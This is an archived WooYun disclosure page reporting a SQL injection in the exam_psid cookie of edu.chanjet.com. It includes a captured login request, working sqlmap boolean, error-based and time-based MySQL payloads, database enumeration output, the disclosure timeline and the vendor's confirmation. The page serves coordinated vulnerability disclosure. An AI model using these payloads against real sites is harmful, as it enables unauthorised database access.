乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-03: 细节已通知厂商并且等待厂商处理中 2015-06-03: 厂商已经确认,细节仅向厂商公开 2015-06-13: 细节向核心白帽子及相关领域专家公开 2015-06-23: 细节向普通白帽子公开 2015-07-03: 细节向实习白帽子公开 2015-07-18: 细节向公众公开
【HD】 以团队之名 以个人之荣耀 共建网络安全
POST数据包:
POST /new/index.php?user-app-login HTTP/1.1Host: edu.chanjet.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://edu.chanjet.com/new/index.php?user-app-loginContent-Length: 123Cookie: exam_psid=f41d75a1acd6f06ee7b957b761436a3d; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432X-Forwarded-For: 8.8.8.8Connection: keep-alivePragma: no-cacheCache-Control: no-cacheargs%5Busername%5D=admin&args%5Buserpassword%5D=admin&userlogin=1&userhash=0.16833434912554046&userhash=0.1766851977663817
cookie 参数 exam_psid 注入(具体注入参数见 漏洞证明)
由于只跑出来一个数据库 就没继续深入了
Cookie parameter 'exam_psid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 593 HTTP(s) requests:---Parameter: exam_psid (Cookie) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: exam_psid=f41d75a1acd6f06ee7b957b761436a3d' RLIKE (SELECT (CASE WHEN (3605=3605) THEN 0x6634316437356131616364366630366565376239353762373631343336613364 ELSE 0x28 END)) AND 'dDxP'='dDxP; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: exam_psid=f41d75a1acd6f06ee7b957b761436a3d' AND EXTRACTVALUE(8268,CONCAT(0x5c,0x717a6a6271,(SELECT (ELT(8268=8268,1))),0x7176717071)) AND 'MCcv'='MCcv; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: exam_psid=f41d75a1acd6f06ee7b957b761436a3d' AND SLEEP(5) AND 'svan'='svan; Hm_lvt_1def95bff1dffff66ff28405f03a2203=1433313432; Hm_lpvt_1def95bff1dffff66ff28405f03a2203=1433313432---[14:47:41] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.2.17back-end DBMS: MySQL 5.1[14:47:41] [INFO] fetching database names[14:47:47] [WARNING] the SQL query provided does not return any output[14:47:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[14:47:47] [INFO] fetching number of databases[14:47:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:47:47] [INFO] retrieved:[14:48:03] [INFO] retrieved:[14:48:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[14:48:52] [ERROR] unable to retrieve the number of databases[14:48:52] [INFO] falling back to current database[14:48:52] [INFO] fetching current database[14:48:58] [INFO] retrieved: eduavailable databases [1]:[*] edu[14:48:58] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\edu.chanjet.com'[*] shutting down at 14:48:58
危害等级:中
漏洞Rank:8
确认时间:2015-06-03 16:40
感谢您对我们的关注和支持,该问题存在,我们正在修复。
暂无